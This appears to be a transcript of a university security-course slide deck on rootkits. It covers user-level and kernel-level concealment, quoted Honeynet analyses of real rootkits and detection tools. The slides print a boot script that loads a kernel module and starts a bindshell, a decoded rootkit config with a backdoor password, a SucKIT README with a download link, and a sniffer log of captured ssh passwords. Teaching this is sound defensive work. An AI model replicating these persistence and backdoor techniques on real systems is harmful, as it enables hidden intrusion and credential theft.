300 likes | 418 Views
Module 2 Rootkits & Post-Intrusion Concealment. Highline Community College Seattle University University of Washington in conjunction with the National Science Foundation. Objectives. What are rootkits? How do attackers use them? How do you defend against them?
E N D
Module 2 Rootkits &Post-Intrusion Concealment Highline Community College Seattle University University of Washington in conjunction with the National Science Foundation
Objectives • What are rootkits? • How do attackers use them? • How do you defend against them? • How can you identify them?
Rootkits Defined A set of tools used by an attacker that allow them to conceal their presence and maintain control of the operating system without the administrator being aware.
Concealment using "Rootkits" • Replacement of operating system commands or system calls • Two fundamental types • Application (User) Level • Kernel Level • Configuration file(s) to control hiding • Often simple to identify/bypass, but can be very difficult to detect/disablehttp://staff.washington.edu/dittrich/misc/faqs/rootkits.faq
Application Level Rootkits • The original rootkits developed for UNIX systems • Many rootkit components are simply “Trojan Horses” • Hackers modify common commands such as ls, ps, netstat so that they perform other things in addition to their intended function • Special program to hide application windows (Windows)
Kernel Level Rootkits • Loadable Kernel Modules (LKMs) • Loadable kernel modules are used by UNIX flavors (e.g., Linux, FreeBSD, and Solaris) to interface with hardware and other data • Kernel level hooks to system calls (e.g., function call table modification) • No replacement of operating system external command programs • Programs hidden from Task Manager and Explorer (Windows) • Can fool "tripwire” style integrity checks • Muchharder to detect
Longevity of Rootkits • Memory based rootkits exist only in RAM and disappear after a reboot • No visible footprint in file system • Requires live system analysis (may be very difficult to detect) • Persistent rootkits stay alive even after a reboot • Require modifying startup files (Unix), Startup Folder (Windows) or Registry Keys (Windows) • Easier to find, but may require static (dead) analysis of file system
Rootkit Example • Scan of the Month #15 (2001)http://project.honeynet.org/scans/scan15/som/som6.txt Following is a step-by-step description of the installationprocess, as determined by the 'last/install' file: a) it instructs the shell to stop logging the script's commands. b) it checks to see if certain files are on the system (make, gcc, sshd). The positive or negative results do not affect the installation. c) it completely replaces: * /sbin/ifconfig * /bin/netstat …
Rootkit Example (cont) c) it completely replaces: … * /bin/ps * /usr/bin/top with its own binaries. Please note that these are precompiled binaries, which means that the time and footprint to install is significantly reduced compared to a kit which compiles sources. d) it creates two files, with the following purpose: * /dev/rpm - which lists process names to exclude from ps and top. * /dev/last - which lists subnets and ports to exclude from netstat. These are similar to a rootkit described here: http://www.sans.org/y2k/013101-1000.htm
Rootkit Example (obfuscated) • Scan of the Month #16 (2001)Contents of unknown file 0000000: a499 9693 9aa2 f599 9691 9bc2 d09b 9a89 ......õ....ÂÐ... 0000010: d08f 8b8c d0cf ced0 9d96 91d0 9996 919b Ð...ÐÏÎÐ...Ð.... 0000020: f59b 8ac2 d09b 9a89 d08f 8b8c d0cf ced0 õ..ÂÐ...Ð...ÐÏÎÐ 0000030: 9d96 91d0 9b8a f593 8cc2 d09b 9a89 d08f ...Ð..õ..ÂÐ...Ð. 0000040: 8b8c d0cf ced0 9d96 91d0 938c f599 9693 ..ÐÏÎÐ...Ð..õ... 0000050: 9aa0 9996 938b 9a8d 8cc2 cfce d393 9d93 .........ÂÏÎÓ... 0000060: 969d 8f8c d18c 90d3 8c91 d193 d38f 8d90 ....Ñ..Ó..Ñ.Ó... 0000070: 92d3 9c93 9a9e 919a 8dd3 9b90 8cd3 8a9c .Ó.......Ó...Ó.. 0000080: 9091 99d1 9691 89d3 8f8c 9d91 9cd3 938f ...Ñ...Ó.....Ó.. 0000090: 9e9c 9c8b d3aa acba adf5 f5a4 8f8c a2f5 ....Óª.º.õõ....õ 00000a0: 8f8c c2d0 9b9a 89d0 8f8b 8cd0 cfce d09d ..ÂÐ...Ð...ÐÏÎÐ. 00000b0: 9691 d08f 8c8d f58f 8ca0 9996 938b 9a8d ..Ð...õ......... 00000c0: 8cc2 938f 8ed3 938f 8c9c 979a 9bd3 8c97 .Â...Ó.......Ó.. 00000d0: ce8b d38f 8c8d d38c 8c97 9bcd d393 8f8c Î.Ó...Ó....ÍÓ... 00000e0: 9a8b d393 8f9e 9c9c 8bd3 9d91 9c93 8fd3 ..Ó......Ó.....Ó 00000f0: 938f 8c86 8cf5 938c 9099 a099 9693 8b9a .....õ.......... 0000100: 8d8c c293 8fd3 8a9c 9091 99d1 9691 89d3 ..Â..Ó.....Ñ...Ó . . .
Rootkit Example(de-obfuscated) • Scan of the Month #16 (2001)http://project.honeynet.org/scans/scan16/som/som30.txt [file] find=/usr/man/man1/xxxxxxbin/find du=/usr/man/man1/xxxxxxbin/du ls=/usr/local/bin/ls.gnu file_filters=xxxxxx,yyyyyy,aaaaaa,mmmmmmmmm [ps] ps=/usr/man/man1/xxxxxxbin/ps ps_filters=nedit,bash . . .
Rootkit Example(de-obfuscated) (cont) . . . [netstat] netstat=/usr/man/man1/xxxxxxbin/netstat net_filters=innu.org [login] su_pass=h4x0r su_loc=/usr/man/man1/xxxxxxbin/su ping=/usr/man/man1/xxxxxxbin/ping passwd=/usr/man/man1/xxxxxxbin/passwd shell=/usr/man/man1/xxxxxxbin/bash
Concealment using LKMs • Example: "Omerta" in "The Hacker's Challenge”http://www.osborne.com/pressroom/0072193840_press.shtml • Example: SucKIT • Advances in Kernel Hackinghttp://www.phrack.org/phrack/58/p58-0x06 • Linux on-the-fly kernel patching without LKMhttp://www.phrack.org/phrack/58/p58-0x07 • Linux x86 kernel function hooking emulationhttp://www.phrack.org/phrack/58/p58-0x08
LKM Example: Adore • Excerpt from "Omerta" analysis ----------------------------------------------------------------------------- # diff rc.local /etc/rc.d/rc.local 36d35 < /usr/sbin/initd ----------------------------------------------------------------------------- The file "initd" is the method used to load the kernel module, and to start the bindshell process, on each boot: ----------------------------------------------------------------------------- #!/bin/sh # automatic install script to load kernel modules for ipv6 support. # do not edit the file directly. /sbin/insmod -f /lib/modules/2.2.16-3/net/ipv6.o >/dev/null 2>/dev/null /usr/sbin/rpc.status ----------------------------------------------------------------------------- . . .
LKM Example: Adore (cont) • Excerpt from "Omerta" analysis . . . ----------------------------------------------------------------------------- The file "rpc.status" contains strings that indicate it is a remote access shell of some sort: ----------------------------------------------------------------------------- . . . leeto bindshell. Enter valid IPX address: gdb (nfsiod) socket bind listen accept /bin/sh /dev/null . . . -----------------------------------------------------------------------------
Example: SucKIT • From the README SucKIT v1.3a, (c) 2002 by sd <sd@cdi.cz> & devik <devik@cdi.cz> +-------------------------------------------------------------+ Code: by sd, with a lot of help from devik <devik@cdi.cz> Concepts: by Silvio Cesare - /dev/kmem, devik - kmalloc & IDT http://phrack.org/p58/phrack-09 Tested: by hundreds of script kiddos around the globe :) Targets: i386-Linux boxen, kernels 2.2.x, 2.4.x without security patches/modules. Downloads: http://sd.g-art.nl/sk . . .
Example: SucKIT (cont) • From the README . . . The SucKIT is easy-to-use, Linux-i386 kernel-based rootkit. The code stays in memory through /dev/kmemtrick, without help of LKM support nor System.map or such things. Everything is done on the fly. It can hide PIDs, files, tcp/udp/raw sockets, sniff TTYs. Next, it have integrated TTY shell access (xor+sha1) which can be invoked through any running service on a server. No compiling on target box needed, one binary can work on any of 2.2.x & 2.4.x kernels precompiled (libc-free)
Example: SucKIT sniffer log • .sniffer output root@moon's password: fr8!rain ssh adonis : root@adonis's password: f93Dk;-w ssh -l victim bashful : The authenticity of host 'bashful (192.168.0.89)' can't be established. DSA key fingerprint is c5:92:c5:4f:3b:51:8b:51:3a:0c:6d:aa:d5:56:8c:fe. Are you sure you want to continue connecting (yes/no)? Warning: Permanently added 'bashful,192.168.0.89' (DSA) to the list of known hosts. victim@bashful's password: t8erTots . . .
Example: SucKIT sniffer (cont) . . . ssh -l victim ida : The authenticity of host 'ida (192.168.0.56)' can't be established. DSA key fingerprint is 17:da:11:28:ea:43:a4:a6:ed:84:4f:43:b5:a2:43:1f. Are you sure you want to continue connecting (yes/no)? Warning: Permanently added 'ida,192.168.0.56' (DSA) to the list of known hosts. victim@ida's password: t8erTots ssh metate : root@metate's password: fr8!rain ssh adonis : root@adonis's password: f93Dk;-w ssh incubus : ssh_exchange_identification: Connection closed by remote host ssh adonis : root@adonis's password: f93Dk;-w
Something is Wrong • Something doesn’t “feel or look” right to the sysadmin • Compare internal view vs. external view • netstat/lsof (Unix) or FPort (Windows) vs. Nmap • Trust very little without proof and second sources of info (best is external to suspect system) • On initial installation, get MD5/SHA1 hash value of each file • Compare later • Or get from hash index site
How to Detect • Keep a close eye on your system (e.g., file fingerprinting, centralized system logging) • Notice unusual traffic with IDS, etc. • Notice unusual ports being used (this could also be botnet activity)
UNIX tools • http://www.chkrootkit.org • chkrootkit • chkrootkit: shell script that checks system binaries for rootkit modification. • ifpromisc.c: checks if the interface is in promiscuous mode. • chklastlog.c: checks for lastlog deletions. • chkwtmp.c: checks for wtmp deletions. • check_wtmpx.c: checks for wtmpx deletions. (Solaris only) • chkproc.c: checks for signs of LKM trojans. • chkdirs.c: checks for signs of LKM trojans. • strings.c: quick and dirty strings replacement. • chkutmp.c: checks for utmp deletions
UNIX tools (cont’d) • http://www.rootkit.nl/projects/rootkit_hunter.html • rkhunter (from their site) • Rootkit hunter is a scanning tool to assure you (to about 99.9%*) you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:- MD5 hash compare- Look for default files used by rootkits- Wrong file permissions for binaries- Look for suspected strings in LKM and KLD modules- Look for hidden files- Optional scan within plaintext and binary filesRootkit Hunter is released as GPL licensed project and free for everyone to use.* No, not really 99.9%.. It's just another security layer
Windows Tools • http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml • RootkitRevealer • Interesting quote from the site • The reason that there is no longer a command-line version is that malware authors have started targetting RootkitRevealer's scan by using its executable name. We've therefore updated RootkitRevealer to execute its scan from a randomly named copy of itself that runs as a Windows service. This type of execution is not conducive to a command-line interface. Note that you can use command-line options to execute an automatic scan with results logged to a file, which is the equivalent of the command-line version's behavior
Windows Tools (cont’d) • http://greatis.com/unhackme/ • unhackme • Windows NT4/2000/XP through SP2 • What's new in version 2.5 Added detection of AFX Rootkit 2005, Elite Keylogger, hidden processes. • What's new in version 2.0 • Added detection and removal of AFX Rootkit and Vanquish Rootkit. • UnHackMe monitor. • Not GPL
Windows Tools (cont’d) • http://www.iarsn.com/taskinfo.html • Taskinfo • Used to look for rogue processes • Works on Windows 95 through 2003 server • TaskInfo shows information about all running processes and threads including ring0 VxD threads. Information about each process includes: • Most of the Processes that want to be invisible like worms, keyloggers and other spy software • All threads (with details including Thread Start Address and Call Stack with Symbolic Information if possible) • CPU usage (multiple CPU supported) • Memory usage • Scheduling rate • Path • Opened files and handles • Loaded modules (DLLs etc.) • Command line • Environment variables • Version information • Connections
What to do Next • Most companies and organizations want to clean up the mess and get back to work (“wipe and reinstall”) • What if it’s on more than one machine? • What if the attacker has other back doors? • What about sniffed passwords, or logged keystrokes? • How did they get in to begin with?
Steps to Take • Isolate the system from the network • Image the drive(s) if possible • Determine which rootkit was used • Go online for information on how to clean up the drive
Resources • http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq • http://en.wikipedia.org/wiki/Root_kit • http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml • http://www.rootkit.com • http://research.microsoft.com/rootkit/